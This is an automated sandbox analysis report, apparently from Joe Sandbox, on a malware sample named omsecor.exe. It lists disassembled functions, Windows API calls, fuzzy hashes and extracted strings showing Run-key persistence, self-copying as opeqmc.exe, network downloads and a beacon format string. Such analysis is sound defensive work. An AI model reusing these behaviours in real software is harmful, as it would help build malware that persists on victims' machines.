Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: Heap$CloseEnvironmentExpandFreeOpenProcessQueryStringsValue
String ID:
API String ID: 3604167287-0
Opcode ID: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
Instruction ID: 704a8cbe2313c99ccb7bf4cac6d27c9c5720caa44ca6f9902b9fd9ccb38d811f
Opcode Fuzzy Hash: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
Instruction Fuzzy Hash: 0521C871900626BBDF205B748E45ABF3668EF05328F10063EF561F22D0EB758D508658

Uniqueness

Uniqueness Score: -1.00%

Function 00409581 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

CharLowerW.USER32(00408E44,00000000,00000000,?,00408E44,00408795), ref: 004095A4
CharLowerW.USER32(00408795), ref: 004095D8
SysFreeString.OLEAUT32(00408795), ref: 00409608
SysFreeString.OLEAUT32(00408E44), ref: 0040960D

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: CharFreeLowerString
String ID:
API String ID: 2335467167-0
Opcode ID: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
Instruction ID: 6911929459278785efe31e607170db17e103bee024a9a22ae291265c1613d99e
Opcode Fuzzy Hash: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
Instruction Fuzzy Hash: 20116D72D00108BBDB019F9ADC85B9E7BB8EF44305F1544BAE405F21A1D779AE409F44

Uniqueness

Uniqueness Score: -1.00%

Function 00408091 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081A3

Strings

-, xrefs: 00408140

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: -
API String ID: 885266447-2547889144
Opcode ID: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
Instruction ID: cbf3f064ca1262f0759db58cdf0f181467b31290bd4ebff5f053a9a619aca6df
Opcode Fuzzy Hash: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
Instruction Fuzzy Hash: 58415D31D0422699CB2177B98E417BB61A9DF44758F1440BFF9C0B72C2EEBC5D8581AE

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: omsecor.exePID: 7740, Parent PID: 1228COMMON

Execution Graph

Execution Coverage:	6.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1147
Total number of Limit Nodes:	8

Executed Functions

Function 0040ABD9 Relevance: 3.0, APIs: 2, Instructions: 26
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72

FindFirstFileW.KERNEL32(?,00000000), ref: 0040AC03
FindClose.KERNEL32(00000000), ref: 0040AC0F

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: FindOpen$CloseFileFirst
String ID:
API String ID: 3155378417-0
Opcode ID: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
Instruction ID: fa0310e4c65bbc590993533f650c85f5e3ee77ef27cd51fa1c8f473dbf319076
Opcode Fuzzy Hash: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
Instruction Fuzzy Hash: 5DE0D87160C7044BE220E7B49D0C967B3DCAB45325F000F36A9B6E20C0FA38D46A465F

Uniqueness

Uniqueness Score: -1.00%

Function 0040B346 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 153
sleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B36C
GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B39D

Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22

GetLastError.KERNEL32(00000004), ref: 0040B3CA
Sleep.KERNEL32(00002710), ref: 0040B3F7
GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B413
CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
ExitProcess.KERNEL32 ref: 0040B44D

Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72

GetLastError.KERNEL32(00000004), ref: 0040B48D
GetLastError.KERNEL32(00000004), ref: 0040B49A
ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 0040B4C7
GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B4D7
GetLastError.KERNEL32(00000004), ref: 0040B500

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 0040B3AD
IueiOod, xrefs: 0040B3A8
opeqmc.exe, xrefs: 0040B36E
/nomove, xrefs: 0040B4D9

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: File$ErrorLastModuleName$Open$CopyCreateEnvironmentExitExpandProcessSleepStrings
String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$opeqmc.exe
API String ID: 3692109554-477663111
Opcode ID: a37a2c0829b51652c0125789b7ef107c293a8625708184dc08050438480bf6fc
Instruction ID: ccf8aad4361994264e72a39918ed7d53ff083e628d4a69ee62a5d407c68d8035
Opcode Fuzzy Hash: a37a2c0829b51652c0125789b7ef107c293a8625708184dc08050438480bf6fc
Instruction Fuzzy Hash: 8C4127719042186AE710B7A19D46FAB73ACEF04345F14447BBB05F11C2EB789A548AAF

Uniqueness

Uniqueness Score: -1.00%

Function 004075D4 Relevance: 22.6, APIs: 15, Instructions: 128
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
GetFileSize.KERNEL32(?,00000000), ref: 0040762E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407638
HeapAlloc.KERNEL32(00000000), ref: 0040763F
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00407660
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040767F
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00407691
ReadFile.KERNEL32(?,?,00000040,?,00000000), ref: 004076A1
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 004076AF
ReadFile.KERNEL32(?,?,000000F8,?,00000000), ref: 004076C5
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 004076EF
WriteFile.KERNEL32(?,?,000000F8,?,00000000), ref: 00407705
CloseHandle.KERNEL32(?), ref: 00407714
CloseHandle.KERNEL32(?), ref: 00407719

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: File$PointerRead$CloseCreateHandleHeapWrite$AllocProcessSize
String ID:
API String ID: 1458499590-0
Opcode ID: 93e258daf756a991a400698467a0f3e6930ee28086f0462060147eb388563e29
Instruction ID: 7ae3b020874f099f6a4231377d147a855b3f50186be4225f3fece46b7b724b47
Opcode Fuzzy Hash: 93e258daf756a991a400698467a0f3e6930ee28086f0462060147eb388563e29
Instruction Fuzzy Hash: F0416A71901028BADB209BA2DD48EEFBF7DEF45390F104476F619F21A0D7709A10DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00409C99 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 127
memorynetworkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenUrlW.WININET(?,hOA,?,00000000,04400000,00000000), ref: 00409CCB
GetProcessHeap.KERNEL32(00000000,00002001,?,?,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF4
HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF7
InternetReadFile.WININET(?,?,00001000,?), ref: 00409D6E
GetProcessHeap.KERNEL32(00000000,00000002,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D80
HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D83
GetProcessHeap.KERNEL32(00000000,00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE3
HeapFree.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE6

Strings

hOA, xrefs: 00409CC5

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: Heap$Process$AllocInternet$FileFreeOpenRead
String ID: hOA
API String ID: 1355009786-3485425990
Opcode ID: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
Instruction ID: 638041e7f74e2b46c75c1535d5ef76f15aa532bf5b3977fbb34850ab96fc5943
Opcode Fuzzy Hash: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
Instruction Fuzzy Hash: 1B418B71900209FFEB119F65C844BAA7BA9FF44355F14847AF819E6292E778CE80CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406E69 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 130
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00406E78

Strings

hOA, xrefs: 00406E7E
8@, xrefs: 00406ED2
0, xrefs: 00406EF5
Page generated at: , xrefs: 00407000
Via: , xrefs: 00406FAF
From: , xrefs: 00406F8E
.html, xrefs: 00406F14
^key=, xrefs: 00406F2E
^nocrypt, xrefs: 00406F5C

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: CountTick
String ID: .html$0$8@$From: $Page generated at: $Via: $^key=$^nocrypt$hOA
API String ID: 536389180-1762329985
Opcode ID: 114e4e40ed3da380897df1d948c25e04c4e8011c16955a8b70e5daac7b5a3a86
Instruction ID: 73e0daeea7a9f5f4b783dd0519eebdf5205f1bdf48cad4214514e0173d2ce6b9
Opcode Fuzzy Hash: 114e4e40ed3da380897df1d948c25e04c4e8011c16955a8b70e5daac7b5a3a86
Instruction Fuzzy Hash: 27416131A0161997CB25EBA2DC51BDE7369FF44308F0044BFB909B71C1EA78AE948F59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A786 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 121
sleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00002710,00000000,00000000,00000000), ref: 0040A7A3
Sleep.KERNEL32(0000EA60,?,00000000,00000000,00000000), ref: 0040A899
Sleep.KERNELBASE(00002710,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8CC
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8E5
HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8EC

Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18

Strings

confirm^rev=%s^code=%s^param=%s^os=%s, xrefs: 0040A7BA
0, xrefs: 0040A848

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: Sleep$Heap$AttemptConnectFreeInternetProcess
String ID: 0$confirm^rev=%s^code=%s^param=%s^os=%s
API String ID: 3100629401-2436734164
Opcode ID: c622fb37aa2467ece8f64e14a3bc52ff303aefc1e596290383a82c184368ac36
Instruction ID: 7defdabbc875a2827947a9af70fbac2689cb4d570e6f2fffa55db425585f7fd8
Opcode Fuzzy Hash: c622fb37aa2467ece8f64e14a3bc52ff303aefc1e596290383a82c184368ac36
Instruction Fuzzy Hash: C0418372D00618AACB11EBE1DC859DF73BCEF44304F10847BF505B6181EA789A558F9E

Uniqueness

Uniqueness Score: -1.00%

Function 0040782A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000000,UniqueNum), ref: 0040784D
CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00407864
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00407879
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00407880
GetTickCount.KERNEL32 ref: 00407888

Strings

UniqueNum, xrefs: 00407836

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: File$ChangeCloseCountCreateFindModuleNameNotificationTickTime
String ID: UniqueNum
API String ID: 341939912-3816303966
Opcode ID: ad12cffd4843a03ac357a7cbd35bb16f9c39c4118ba2163eb990dc6e8f3d9bd4
Instruction ID: 2f8cc66c71eb5b32faf52737d8a911681d4da4e376004c23895cdbe2f04b10ac
Opcode Fuzzy Hash: ad12cffd4843a03ac357a7cbd35bb16f9c39c4118ba2163eb990dc6e8f3d9bd4
Instruction Fuzzy Hash: AE110633419220ABD210AB65EC4CA9B7FACEF45760F004A3AF964E21D0D6349211C7AB

Uniqueness

Uniqueness Score: -1.00%

Function 00407E2B Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 54
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNEL32(00000000,00000000,00000000,UniqueNum), ref: 00407E5C
ReadFile.KERNEL32(?,00000064,00000001,00000000), ref: 00407E74

Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
Part of subcall function 00407CD7: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48

Strings

d, xrefs: 00407E7E
x, xrefs: 00407E86
UniqueNum, xrefs: 00407E38
hOAd, xrefs: 00407E91

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: File$CreateModuleNamePointerRead
String ID: UniqueNum$d$hOAd$x
API String ID: 1528952607-1018652783
Opcode ID: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
Instruction ID: 0df55d11f519ebf6f0451cc58b4543fb7278309a9039aac926228ebb90f40a66
Opcode Fuzzy Hash: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
Instruction Fuzzy Hash: 5311A531D09308AADF109B61DD05BDB3B6AAB00324F218676E612F61E0E7749D44CBAE

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC20 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 49
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72

Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 0040AC39, 0040AC3E, 0040AC6C
IueiOod, xrefs: 0040AC50, 0040AC82
/nomove, xrefs: 0040AC23

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: Open$CloseQueryValue
String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
API String ID: 3546245721-4228964922
Opcode ID: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
Instruction ID: 3bac8edf5f415b784fe4546894dc74dc09b9405a13c640cee1cd261e7a9a2bb6
Opcode Fuzzy Hash: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
Instruction Fuzzy Hash: 5F01867265430EFEFF1096919D42F9A736CDB40768F210036FA00B60D1D6B6AE155779

Uniqueness

Uniqueness Score: -1.00%

Function 0040AAFD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineW.KERNEL32(?,0040B3E5), ref: 0040AB0A
GetModuleFileNameW.KERNEL32(00000000,?,00000820,00000400,?,0040B3E5), ref: 0040AB44
CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB57
CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB60

Strings

/nomove, xrefs: 0040AB10

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: CharLower$CommandFileLineModuleName
String ID: /nomove
API String ID: 1338073227-1111986840
Opcode ID: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
Instruction ID: b8029fc6669f79c45f6caaa8ce38406425976cf3cabd4088da44db58d281c6d8
Opcode Fuzzy Hash: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
Instruction Fuzzy Hash: 7CF01D7290022956DB10A7B19C05BDB72ACFF40309F0445B6AA05F2180ED78EA548F95

Uniqueness

Uniqueness Score: -1.00%

Function 00407CD7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
GetCurrentDirectoryW.KERNEL32(00001000,?,?,00407E44,00000001,UniqueNum), ref: 00407D15
CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48

Strings

\merocz.xc6, xrefs: 00407D1B

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: File$CreateCurrentDirectoryModuleName
String ID: \merocz.xc6
API String ID: 3818821825-505599559
Opcode ID: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
Instruction ID: bb9f2ddab4bab237696810683399403c99d26191ea9c434de7a02090ea9b9a12
Opcode Fuzzy Hash: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
Instruction Fuzzy Hash: DA01A231904224ABE7309B569C49FEB77ADEF85710F00447FB505F20D1D6749A80CAAA

Uniqueness

Uniqueness Score: -1.00%

Function 00407727 Relevance: 6.1, APIs: 4, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000400,771B0900,00000400,00000000,0040B4B3,00000000), ref: 00407744
ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 00407784
GetLastError.KERNEL32(00000004), ref: 004077A9

Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: File$Create$EnvironmentErrorExpandLastModuleNameStrings
String ID:
API String ID: 1536607067-0
Opcode ID: 89cd35a4e2c2c3bd6fcfd873d8aca65b8c9597df86e0d91d22dc3db87ccf143e
Instruction ID: de8f4f1c442ba604be96c6aabbb627c7d922d162aa2fadd5385f895ae0141ebd
Opcode Fuzzy Hash: 89cd35a4e2c2c3bd6fcfd873d8aca65b8c9597df86e0d91d22dc3db87ccf143e
Instruction Fuzzy Hash: AD11E972908249AED720D7A19C81FEB739CFB44354F10483BFB95E30D0E678B945866B

Uniqueness

Uniqueness Score: -1.00%

Function 004069C0 Relevance: 3.0, APIs: 2, Instructions: 25
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
Instruction ID: 7cb27e63b8b96f7a1a34dd7d249ffcc2d4336ce0f7aa5f451266b78b49120899
Opcode Fuzzy Hash: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
